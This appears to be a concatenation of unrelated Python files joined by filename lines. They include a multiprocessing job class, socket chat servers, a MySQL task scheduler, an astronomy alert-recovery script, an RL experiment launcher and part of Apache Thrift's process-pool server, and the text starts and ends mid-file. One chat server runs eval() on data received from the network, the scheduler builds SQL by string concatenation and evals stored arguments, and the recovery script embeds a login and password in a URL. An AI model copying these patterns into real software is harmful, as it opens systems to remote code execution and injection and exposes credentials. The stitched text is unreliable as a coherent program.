self.mapper_queues = [ShmQueue(maxsize=max_size_per_mapper_queue) for _ in range(num_of_processor)]
if enable_collector_queues:
self.collector_queues = [ShmQueue(maxsize=max_size_per_collector_queue) for _ in range(num_of_processor)]
else:
self.collector_queues = None
else:
raise ValueError("shm not available in this version of Python.")
else:
if single_mapper_queue:
self.mapper_queues = [mp.Queue(maxsize=max_size_per_mapper_queue * num_of_processor)]
else:
self.mapper_queues = [mp.Queue(maxsize=max_size_per_mapper_queue) for _ in range(num_of_processor)]
if enable_collector_queues:
self.collector_queues = [mp.Queue(maxsize=max_size_per_collector_queue) for _ in range(num_of_processor)]
self.collector_qstats = [self.QSTATS_ON for _ in range(num_of_processor)]
else:
self.collector_queues = None
if self.collector_queues is not None:
if single_mapper_queue:
self.processes = [mp.Process(target=self._run, args=(i, self.mapper_queues[0], self.collector_queues[i]))
for i in range(num_of_processor)]
else:
self.processes = [mp.Process(target=self._run, args=(i, self.mapper_queues[i], self.collector_queues[i]))
for i in range(num_of_processor)]
else:
if single_mapper_queue:
self.processes = [mp.Process(target=self._run, args=(i, self.mapper_queues[0], None))
for i in range(num_of_processor)]
else:
self.processes = [mp.Process(target=self._run, args=(i, self.mapper_queues[i], None))
for i in range(num_of_processor)]
if progress is not None:
if sys.version_info >= (3, 8):
self.progress_queues: typing.Optional[typing.Union[ShmQueue, mp.Queue]]
else:
self.progress_queues: typing.Optional[mp.Queue]
if use_shm:
if sys.version_info >= (3, 8):
self.progress_queues = [ShmQueue(maxsize=1) for _ in range(num_of_processor)]
else:
raise ValueError("shm not available in this version of Python.")
else:
self.progress_queues = [mp.Queue(maxsize=1) for _ in range(num_of_processor)]
self.progress_qstats = [self.QSTATS_ON for _ in range(num_of_processor)]
else:
self.progress_queues = None
self.progress = progress
ctx = self
if not inspect.isclass(mapper) or not issubclass(mapper, Mapper):
class DefaultMapper(Mapper):
def process(self, *args, **kwargs):
if ctx.enable_process_id:
kwargs['_idx'] = self._idx
return mapper(*args, **kwargs)
self.mapper = DefaultMapper
else:
self.mapper = mapper
self.collector = collector
self.mapper_queue_index = 0
self.enable_process_id = enable_process_id
self.batch_size = batch_size
self.batch_data = []
# collector can be handled in each process or in main process after merging (collector needs to be set)
# if collector is set, it needs to be handled in main process;
# otherwise, it assumes there's no collector.
if collector:
self.collector_thread = CollectorThread(self, collector)
if progress:
self.progress_thread = ProgressThread(self, progress, progress_total, num_of_processor)
def start(self):
"""
Start processes and threads.
"""
if self.collector:
self.collector_thread.start()
if self.progress:
self.progress_thread.start()
for p in self.processes:
p.start()
def join(self):
"""
Block until processes and threads return.
"""
if self.collector:
self.collector_thread.join()
if self.progress:
self.progress_thread.join()
for p in self.processes:
p.join()
for q in self.mapper_queues:
q.close()
q.join_thread()
if self.collector_queues is not None:
for q in self.collector_queues:
q.close()
q.join_thread()
if self.progress_queues is not None:
for q in self.progress_queues:
q.close()
q.join_thread()
def task_done(self):
"""
        Indicate that all tasks have been added via `add_task`, and signal the worker processes to stop.
(main process, blocked)
"""
if len(self.batch_data) > 0:
self._add_task(self.batch_data)
self.batch_data = []
for i in range(self.num_of_processor):
if self.single_mapper_queue:
self.mapper_queues[0].put((ParallelProcessor.CMD_STOP,))
else:
self.mapper_queues[i].put((ParallelProcessor.CMD_STOP,))
def add_task(self, *args, **kwargs):
"""
        Add data to a mapper queue.
When a single mapper queue is in use, put the process to sleep if the
queue is full. When multiple mapper queues are in use (one per process),
use CPU-intensive polling (round-robin processing) to find the next available
queue. (main process, blocked or unblocked depending upon single_mapper_queue)
"""
self.batch_data.append((args, kwargs))
if self.progress:
self.progress_thread.progress_info[ProgressThread.P_ADDED] += 1
if len(self.batch_data) == self.batch_size:
self._add_task(self.batch_data)
self.batch_data = [] # reset buffer
def _add_task(self, batched_args):
if self.single_mapper_queue:
self.mapper_queues[0].put((ParallelProcessor.CMD_DATA, batched_args))
else:
while True:
q = self.mapper_queues[self.mapper_queue_index]
self.mapper_queue_index = (self.mapper_queue_index + 1) % self.num_of_processor
try:
q.put_nowait((ParallelProcessor.CMD_DATA, batched_args))
return # put in
except queue.Full:
continue # find next available
def _run(self, idx: int, mapper_queue: mp.Queue, collector_queue: typing.Optional[mp.Queue]):
"""
Process's activity. It handles queue IO and invokes user's mapper handler.
(subprocess, blocked, only two queues can be used to communicate with main process)
"""
with self.mapper(idx) as mapper:
while True:
data = mapper_queue.get()
if data[0] == ParallelProcessor.CMD_STOP:
# print(idx, 'stop')
self._update_progress(mapper, finish=True)
if self.collector and collector_queue is not None:
collector_queue.put((ParallelProcessor.CMD_STOP,))
return
elif data[0] == ParallelProcessor.CMD_DATA:
batch_result = []
for d in data[1]:
args, kwargs = d[0], d[1]
# print(idx, 'data')
self._update_progress(mapper, type_=ProgressThread.P_LOADED)
result = mapper.process(*args, **kwargs)
self._update_progress(mapper, type_=ProgressThread.P_PROCESSED)
if collector_queue is not None:
if self.collector:
if not isinstance(result, tuple): # collector must represent as tuple
result = (result,)
batch_result.append(result)
if collector_queue is not None and len(batch_result) > 0:
collector_queue.put((ParallelProcessor.CMD_DATA, batch_result))
batch_result = [] # reset buffer
def _update_progress(self, mapper, type_=None, finish=False):
if self.progress:
try:
if not finish:
# No need to ensure the status will be pulled from main process
# so if queue is full just skip this update
mapper._progress_info[type_] += 1
self.progress_queues[mapper._idx].put_nowait( (ParallelProcessor.CMD_DATA, mapper._progress_info) )
else:
# update the last progress of each mapper
self.progress_queues[mapper._idx].put( (ParallelProcessor.CMD_STOP, mapper._progress_info) )
except queue.Full:
pass
def collect(self):
"""
Get data from collector queue sequentially.
(main process, unblocked, using round robin to find next available queue)
"""
if not self.collector:
return
idx = 0
while True:
# all queues finished
if sum([int(s == self.QSTATS_OFF) for s in self.collector_qstats]) == self.num_of_processor:
return
# get next unfinished queue
while self.collector_qstats[idx] == self.QSTATS_OFF:
idx = (idx + 1) % self.num_of_processor
q = self.collector_queues[idx]
try:
data = q.get_nowait() # get out
if data[0] == ParallelProcessor.CMD_STOP:
self.collector_qstats[idx] = self.QSTATS_OFF
elif data[0] == ParallelProcessor.CMD_DATA:
yield data[1]
except queue.Empty:
continue # find next available
finally:
idx = (idx + 1) % self.num_of_processor
def get_progress(self):
"""
Get progress information from each mapper.
(main process)
"""
if not self.progress:
return
idx = 0
while True:
# all queues finished
if sum([int(s == self.QSTATS_OFF) for s in self.progress_qstats]) == self.num_of_processor:
return
# get next unfinished queue
while self.progress_qstats[idx] == self.QSTATS_OFF:
idx = (idx + 1) % self.num_of_processor
q = self.progress_queues[idx]
try:
data = q.get_nowait()
if data[0] == ParallelProcessor.CMD_STOP:
self.progress_qstats[idx] = self.QSTATS_OFF
elif data[0] == ParallelProcessor.CMD_DATA:
pass
yield idx, data[1]
except queue.Empty:
continue # find next available
finally:
idx = (idx + 1) % self.num_of_processor
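
# A minimal end-to-end usage sketch (added for illustration; it only uses the API
# documented above): square numbers in two worker processes, collect the results
# back in the main process, and share a single mapper queue so that producers
# block instead of busy-polling.
if __name__ == '__main__':
    results = []

    def square(x):
        return x * x

    def collect(value):
        results.append(value)

    pp = ParallelProcessor(2, square, collector=collect, single_mapper_queue=True)
    pp.start()
    for n in range(10):
        pp.add_task(n)
    pp.task_done()
    pp.join()
    print(sorted(results))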
|
server.py
|
import os
import socket
import threading
from copy import deepcopy
HOST = ''
PORT = 8000
BUFFER = 1024
ADDR = (HOST, PORT)
ADDRS = []
ADDR_CONN = {}
FILE_RECV = []
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(ADDR)
s.listen(10)
def msg_handle(data, conn: socket.socket, addr: tuple):
try:
data = data.decode('utf-8')
try:
head,data,usrs = data.split('::')
except (TypeError, ValueError):
print('Transmitting file...')
data = data.encode()
head = ''
except UnicodeDecodeError:
print('Transmitting file...')
head = ''
if head == 'ONLINE':
addr_copy = deepcopy(ADDRS)
addr_copy.remove(addr)
conn.send('ONLINE::{}'.format(addr_copy).encode())
del addr_copy
elif head == 'MSG':
print(usrs, type(usrs))
for usr in eval(usrs):
try:
ADDR_CONN[usr].send(f'MSG::{data}'.encode())
except OSError:
ADDR_CONN.pop(usr)
# conn.send('MSG:[{0}] {1}'.format(ctime(), data).encode())
elif head == 'FILE':
FILE_RECV.clear()
if data == 'OK':
usr = eval(usrs)
FILE_RECV.append(addr)
ADDR_CONN[usr].send(f'FILE::OK'.encode())
else:
for usr in eval(usrs):
ADDR_CONN[usr].send(f'FILE::{data};;{addr}'.encode())
# t = threading.Thread(target=file_handle, args=(data,usrs,conn,addr))
# t.start()
elif head == 'IMG':
FILE_RECV.clear()
for usr in eval(usrs):
FILE_RECV.append(usr)
ADDR_CONN[usr].send(f'IMG::{data};;{addr}'.encode())
print(usrs)
else:
# print(data, type(data))
for usr in FILE_RECV:
ADDR_CONN[usr].send(data)
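
# Illustrative client-side helpers for the 'HEAD::data::users' wire format parsed by
# msg_handle() above (a sketch added for clarity, not part of the original server).
# `users` is the textual form of a list of (host, port) address tuples, exactly as the
# server reports them in its ONLINE reply.
def example_request_online(sock: socket.socket):
    # Ask the server which other clients are currently online.
    sock.send('ONLINE::-::-'.encode())

def example_send_message(sock: socket.socket, text: str, users: list):
    # Relay a chat message to the clients identified by `users`.
    sock.send('MSG::{}::{}'.format(text, users).encode())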
def link_solve(conn: socket.socket, addr: tuple):
while 1:
try:
# data = conn.recv(BUFFER).decode('utf-8')
data = conn.recv(BUFFER)
if not data:
break
msg_handle(data, conn, addr)
except ConnectionResetError as e:
print(f'{e}')
print(f'{addr} offline.')
ADDRS.remove(addr)
ADDR_CONN.pop(addr)
break
conn.close()
def recv_data():
while 1:
print('waiting for connection...')
conn, addr = s.accept()
print('...connecting from:', addr)
if addr not in ADDRS:
ADDRS.append(addr)
ADDR_CONN[addr] = conn
t = threading.Thread(target=link_solve,args=(conn, addr))
t.start()
s.close()
if __name__ == '__main__':
t1 = threading.Thread(target=recv_data, args=())
t1.start()
|
server.py
|
import socket
import threading
HEADER = 64
PORT = 5050
FORMAT = "utf-8"
DISCONNECT_MESSAGE = "!DISCONNECT"
# SERVER = socket.gethostbyname(socket.gethostname()) # Get the IP address automatically
SERVER = "192.168.0.114"
ADDR = (SERVER,PORT)
server = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
# We'll not pass this line until we get a msg from the client
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS]: {threading.activeCount() - 1}")
print("[STARTING] server is starting ....")
start()
|
beat.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Task Beat
This module define function which can execute muti-asyn-task and dispatch tasks.
Use stack to sort the date of task which will be executing.Min_time is the Main
processing sleeping time that can compute more quick to execute task .
pool = db_instance.ConnectionPool(**db_config.mysql)linu
...
use database pool to connect mysql
@async
def execute_task(taskList):
...
use muti-thread to execute task. Performance: 1000 tasks /s
Usage:
$ python task_beat.py
suggestion:
you can use supervisor to make sure the main progress will not die in abnormal
condition .
"""
from datetime import datetime, timedelta
from threading import Thread
from config import shadowx_config, shadowx_sqlconfig
from config.shadowx_config import DATE_FORMATE
from dbpool import db_instance
from worker import execute
from run.crontab import crontab_run_nextTime
import time
import json
import heapq
MAIN_SLEEP_TIME = 1
def run_async(f):
    '''Run the decorated function asynchronously in a new thread
    (named run_async because `async` is a reserved keyword in Python 3.7+).'''
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
def date_seconds(date1, date2):
    '''Convert the time difference to seconds.'''
di = date2 - date1
return di.days*24*3600 + di.seconds
def connection_pool():
    '''Get a database connection pool instance.'''
pool = db_instance.ConnectionPool(**shadowx_config.mysql)
return pool
def init_task():
    '''Initialize tasks: set every task's last_run_time to now.'''
with connection_pool().cursor() as cursor:
print("init ...")
init_time = (datetime.now()).strftime(DATE_FORMATE)
sql = "update monitor_items set last_run_time = '" + init_time + "'"
cursor.execute(sql)
@run_async
def update_task(task_id, run_time):
    '''Asynchronously update the task's next run time.'''
with connection_pool().cursor() as cursor:
sql = "update monitor_items set last_run_time = '" + run_time + "' where id = %d" % task_id
cursor.execute(sql)
def execute_muti_tasks(id, task_name, task_args):
task_args = eval(task_args)
task_args["item_id"] = str(id)
execute.apply_async(args=[task_name], kwargs=eval(str(task_args)))
@run_async
def execute_task(taskList):
    '''Execute the tasks that are due (min-heap style scheduling).'''
now_time = datetime.now()
run_time = list()
count = 0
for task in taskList:
dt = date_seconds(now_time, task['last_run_time'])
        # If the difference is 0, execute the task and set its time to the new next_run_time
if dt == 0:
            # Execute interval (recurring) tasks
if task['task_type'] == 1:
if task['task_args'] is None:
execute.apply_async(args=[task['task_name']])
else:
execute_muti_tasks(task['id'], task['task_name'], task['task_args'])
next_run_time = (datetime.now() + timedelta(seconds=task['sec'])).strftime(DATE_FORMATE)
update_task(task_id=task['id'], run_time=next_run_time)
run_time.append(task['sec'])
count += 1
            # Execute crontab (scheduled) tasks
elif task['task_type'] == 2:
if task['task_args'] is None:
execute.apply_async(args=[task['task_name']])
else:
execute_muti_tasks(task['id'], task['task_name'], task['task_args'])
                # Compute the next run time
next_run_time = crontab_run_nextTime(task['crontab'])[0]
update_task(task_id=task['id'], run_time=next_run_time)
run_time.append(date_seconds(datetime.strptime(next_run_time, DATE_FORMATE), now_time))
count += 1
elif dt < 0:
            # If the difference is negative, reset the time to the new next_run_time
if task['task_type'] == 1:
next_run_time = (datetime.now() + timedelta(seconds=task['sec'])).strftime(DATE_FORMATE)
update_task(task_id=task['id'], run_time=next_run_time)
run_time.append(task['sec'])
elif task['task_type'] == 2:
next_run_time = crontab_run_nextTime(task['crontab'])[0]
update_task(task_id=task['id'], run_time=next_run_time)
run_time.append(date_seconds(datetime.strptime(next_run_time, DATE_FORMATE), now_time))
else:
run_time.append(dt)
if count > 0:
print("execute success tasks: %d " % count)
print(run_time)
def _main(notin):
    '''Fetching the full task list could be optimized with a local queue.'''
with connection_pool().cursor() as cursor:
res = cursor.execute(shadowx_sqlconfig.GET_SOME_TASK + str(notin))
tasks = sorted(cursor, key=lambda x: x['id'])
        # Return the minimum sleep time
        if len(tasks) > 0:
            print(datetime.now().strftime(DATE_FORMATE) + ": main process sleeping and task num: %d " % len(tasks))
            execute_task(tasks)
else:
print("task num is zero , sleeping %d s" % 5)
time.sleep(5)
        # The main process sleeps between iterations
time.sleep(MAIN_SLEEP_TIME)
'''
tasks[0]: master monitoring switch
tasks[1]: class A monitoring switch
tasks[2]: class B monitoring switch
tasks[3]: class C monitoring switch
tasks[4]: class D monitoring switch
tasks[5]: class E monitoring switch
tasks[6]: log monitoring switch
'''
def _main_set():
with connection_pool().cursor() as cursor:
res = cursor.execute(shadowx_sqlconfig.GET_WARN_SET)
tasks = sorted(cursor, key=lambda x: x['id'])
notin = []
for task in tasks[1:]:
if task["status"] == 0:
notin.append(task["id"])
notin.append(0)
return tasks[0], tuple(notin)
def run():
    master_switch, notin = _main_set()
    if master_switch["status"]:
_main(notin)
else:
print("Monitor is closed ")
time.sleep(5)
if __name__ == "__main__":
init_task()
    # Exceptions must not interrupt the main process
    while True:
        try:
            run()
        except Exception:
            # swallow the error and retry on the next iteration
            time.sleep(MAIN_SLEEP_TIME)
|
recover_ssnamenr.py
|
#!/usr/bin/env python
"""
Recover missing columns in the archive database from UW tarballs
"""
import datetime
import itertools
import io
import logging
import multiprocessing
import tarfile
import time
import queue
import fastavro
import requests
from ampel.pipeline.t0.alerts.TarAlertLoader import TarAlertLoader
from ampel.archive import ArchiveDB

# Module-level logger so that worker processes (e.g. blobs_from_tarball) can log
log = logging.getLogger(__name__)
def blobs_from_tarball(procnum, queue, date, partnership=True):
i = 0
try:
if partnership:
url = 'https://ztf:16chipsOnPalomar@ztf.uw.edu/alerts/partnership/ztf_partnership_{}.tar.gz'.format(date)
else:
url = 'https://ztf.uw.edu/alerts/public/ztf_public_{}.tar.gz'.format(date)
response = requests.get(url, stream=True)
response.raise_for_status()
loader = TarAlertLoader(file_obj=response.raw)
for i, fileobj in enumerate(iter(loader)):
queue.put(fileobj.read())
except (tarfile.ReadError, requests.exceptions.HTTPError):
pass
finally:
if i > 0:
log.info('ztf_{}_{} finished ({} alerts)'.format(['public', 'partnership'][partnership], date, i))
queue.put(procnum)
from sqlalchemy import select, and_, bindparam, exists
from sqlalchemy.sql.schema import UniqueConstraint
class Updater:
def __init__(self, connection, table, fields):
self._connection = connection
ids = next(c for c in table.constraints if isinstance(c, UniqueConstraint)).columns
condition = and_(*(c == bindparam('b_'+c.name) for c in ids))
values = {name: bindparam('b_'+name) for name in fields}
pkey = table.primary_key.columns.values()[0]
# NB: because we select by a set of columns with a UNIQUE constraint,
# all rows that are locked can be safely skipped, as they are already
# being updated in another process
self._query = table.update().where(pkey==select([pkey]).where(condition).with_for_update(skip_locked=True)).values(**values)
self._fields = set([c.name for c in ids] + list(fields))
self._values = []
def __len__(self):
return len(self._values)
def add(self, list_of_dicts):
self._values += [{'b_'+k: item.get(k) for k in self._fields} for item in list_of_dicts]
def commit(self):
if len(self._values) == 0:
return
self._connection.execute(self._query, self._values)
self._values.clear()
def split_upper_limits(prv):
parts = [[], []]
if prv is not None:
for element in prv:
parts[element['candid'] is None].append(element)
return parts
def ingest_blobs(procnum, queue, archive_url):
db = ArchiveDB(archive_url)
# end implicit transaction
db._connection.execute('COMMIT')
update_candidate = Updater(db._connection, db._meta.tables['candidate'], ('isdiffpos', 'ssnamenr', 'magzpscirms'))
update_prv_candidate = Updater(db._connection, db._meta.tables['prv_candidate'], ('isdiffpos', 'ssnamenr'))
update_upper_limit = Updater(db._connection, db._meta.tables['upper_limit'], ('rbversion',))
def commit():
with db._connection.begin() as transaction:
try:
update_candidate.commit()
update_prv_candidate.commit()
update_upper_limit.commit()
transaction.commit()
except:
transaction.rollback()
raise
while True:
try:
            blob = queue.get()
            if blob is None:  # sentinel from the main process: flush pending updates and exit
                commit()
                return
            alert = next(fastavro.reader(io.BytesIO(blob)))
update_candidate.add([alert['candidate']])
dets, uls = split_upper_limits(alert['prv_candidates'])
update_prv_candidate.add(dets)
update_upper_limit.add(uls)
if len(update_candidate) > 1000:
commit()
except:
commit()
raise
'''
def ingest_blobs(procnum, queue, archive_url):
while True:
blob = queue.get()
if blob is None:
break
'''
def recover(args):
logging.basicConfig(level='INFO', format='%(asctime)s %(name)s:%(levelname)s: %(message)s')
log = logging.getLogger()
# Spawn 1 reader each for the public and private alerts of each night
begin = datetime.datetime(2018,6,1)
dates = [(begin + datetime.timedelta(i)).strftime('%Y%m%d') for i in range((datetime.datetime.now()- begin).days)]*2
input_queue = multiprocessing.Queue(10*args.workers)
sources = {i: multiprocessing.Process(target=blobs_from_tarball, args=(i,input_queue,date,i%2==0)) for i,date in enumerate(dates)}
for i, p in enumerate(sources.values()):
if i == args.workers:
break
p.start()
output_queues = [multiprocessing.Queue(10) for i in range(args.workers)]
sinks = {i: multiprocessing.Process(target=ingest_blobs, args=(i,output_queues[i],args.archive)) for i in range(args.workers)}
for p in sinks.values():
p.start()
try:
t0 = time.time()
count = 0
chunk = 10000
while len(sources) > 0 or not input_queue.empty():
message = input_queue.get()
if isinstance(message, int):
sources[message].join()
del sources[message]
ready = [p for p in sources.values() if p.pid is None]
if len(ready) > 0:
ready[0].start()
else:
min(output_queues, key=lambda q: q.qsize()).put(message)
count += 1
if count % chunk == 0:
dt = time.time() - t0
log.info('{} ({:.1f} alerts/s)'.format(count, chunk/dt))
t0 = time.time()
finally:
for p in sources.values():
p.terminate()
p.join()
for i, q in enumerate(output_queues):
log.info("Stopping sink {}".format(i))
q.put(None)
sinks[i].join()
def check(args):
from astropy.time import Time
from sqlalchemy import and_, func, select
from sqlalchemy.sql.functions import count
import sys
begin = datetime.datetime(2018,6,1)
end = begin + datetime.timedelta((datetime.datetime.now() - begin).days)
dates = [(begin + datetime.timedelta(i)) for i in range((datetime.datetime.now()- begin).days)]
programs = ['public', 'partnership']
db = ArchiveDB(args.archive)
Alert = db._meta.tables['alert']
jd = func.width_bucket(Alert.c.jd, Time(begin).jd, Time(end).jd, int(Time(end).jd-Time(begin).jd))
programid = func.width_bucket(Alert.c.programid, 0.5,2.5,2)
q = select([jd, programid, count()]).group_by(jd, programid).order_by(jd, programid)
total = 0
for row in db._connection.execute(q):
i, j, count = row
if j < 1 or j > 2 or i < 1 or i > len(dates):
continue
total += count
label = 'ztf_{}_{}'.format(programs[j-1], dates[i-1].strftime('%Y%m%d'))
print('{} finished ({} alerts)'.format(label, count-1))
sys.stderr.write('{} total\n'.format(total))
return
programs = {1: 'public', 2: 'partnership'}
for date, bounds in zip(dates, bounds):
for programid, name in programs.items():
label = 'ztf_{}_{}'.format(name, date.strftime('%Y%m%d'))
q = Alert.count(and_(Alert.c.jd > bounds[0].jd, Alert.c.jd < bounds[1].jd, Alert.c.programid == programid))
count = db._connection.execute(q).fetchone()[0]
if count > 0:
print('{} finished ({} alerts)'.format(label, count-1))
sys.stdout.flush()
if __name__ == "__main__":
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
parser = ArgumentParser(description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter)
parser.add_argument("--archive", type=str, default="localhost:5432")
subparsers = parser.add_subparsers()
p = subparsers.add_parser('recover')
p.set_defaults(func=recover)
p.add_argument("--workers", type=int, default=4, help="Number of db clients to start")
p = subparsers.add_parser('check')
p.set_defaults(func=check)
args = parser.parse_args()
args.func(args)
|
swimmer-v2.py
|
import os, sys, signal
import random
import numpy as np
from multiprocessing import Process, Queue, current_process, freeze_support
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--pgmorl', default=False, action='store_true')
parser.add_argument('--ra', default=False, action='store_true')
parser.add_argument('--pfa', default=False, action='store_true')
parser.add_argument('--moead', default=False, action='store_true')
parser.add_argument('--random', default=False, action='store_true')
parser.add_argument('--num-seeds', type=int, default=6)
parser.add_argument('--num-processes',
type=int,
default=1,
help='number of algorithms to be run in parallel (Note: each algorithm needs 4 * num-tasks processors by default, so the total number of processors is 4 * num-tasks * num-processes.)')
parser.add_argument('--save-dir', type=str, default='./results/Swimmer-v2')
args = parser.parse_args()
random.seed(2000)
commands = []
save_dir = args.save_dir
test_pgmorl = args.pgmorl
test_ra = args.ra
test_random = args.random
test_pfa = args.pfa
test_moead = args.moead
for i in range(args.num_seeds):
seed = random.randint(0, 1000000)
if test_pgmorl:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method prediction-guided '\
'--num-weight-candidates 7 '\
'--num-tasks 6 '\
'--sparsity 1.0 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pgmorl/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_ra:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method ra '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/ra/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_random:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method random '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/random/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_pfa:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method pfa '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/pfa/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
if test_moead:
cmd = 'python morl/run.py '\
'--env-name MO-Swimmer-v2 '\
'--seed {} '\
'--num-env-steps 2000000 '\
'--warmup-iter 40 '\
'--update-iter 10 '\
'--min-weight 0.0 '\
'--max-weight 1.0 '\
'--delta-weight 0.2 '\
'--eval-num 1 '\
'--pbuffer-num 100 '\
'--pbuffer-size 2 '\
'--selection-method moead '\
'--num-tasks 6 '\
'--obj-rms '\
'--ob-rms '\
'--raw '\
'--save-dir {}/moead/{}/'\
.format(seed, save_dir, i)
commands.append(cmd)
def worker(input, output):
for cmd in iter(input.get, 'STOP'):
ret_code = os.system(cmd)
if ret_code != 0:
output.put('killed')
break
output.put('done')
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for cmd in commands:
task_queue.put(cmd)
# Submit stop signals
for i in range(args.num_processes):
task_queue.put('STOP')
# Start worker processes
for i in range(args.num_processes):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
for i in range(args.num_processes):
print(f'Process {i}', done_queue.get())
|
TProcessPoolServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import collections
from multiprocessing import Process, Value, Condition, reduction
from .TServer import TServer
from thrift.transport.TTransport import TTransportException
from thrift.protocol.THeaderProtocol import THeaderProtocolFactory
class TProcessPoolServer(TServer):
"""
Server with a fixed size pool of worker subprocesses which service requests.
Note that if you need shared state between the handlers - it's up to you!
Written by Dvir Volk, doat.com
"""
def __init__(self, * args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
        if not callable(callback):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop around getting clients from the shared queue and
process them."""
if self.postForkCallback:
self.postForkCallback()
        while self.isRunning.value:
try:
client = self.serverTransport.accept()
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
except Exception as x:
logging.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
if isinstance(self.inputProtocolFactory, THeaderProtocolFactory):
oprot = iprot
else:
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransportException as tx:
pass
except Exception as x:
logging.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start a fixed number of worker threads and put client into a queue"""
# this is a shared state that can tell the workers to exit when set
# as false
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
except Exception as x:
logging.exception(x)
#wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
except Exception as x:
logging.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
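
# Typical usage sketch (illustration only; `MyService` and its handler are hypothetical,
# and the transport/protocol factories shown are the usual Thrift defaults rather than
# anything mandated by this class):
#
#   processor = MyService.Processor(MyHandler())
#   transport = TSocket.TServerSocket(port=9090)
#   tfactory = TTransport.TBufferedTransportFactory()
#   pfactory = TBinaryProtocol.TBinaryProtocolFactory()
#
#   server = TProcessPoolServer(processor, transport, tfactory, pfactory)
#   server.setNumWorkers(4)
#   server.serve()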
|
server.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
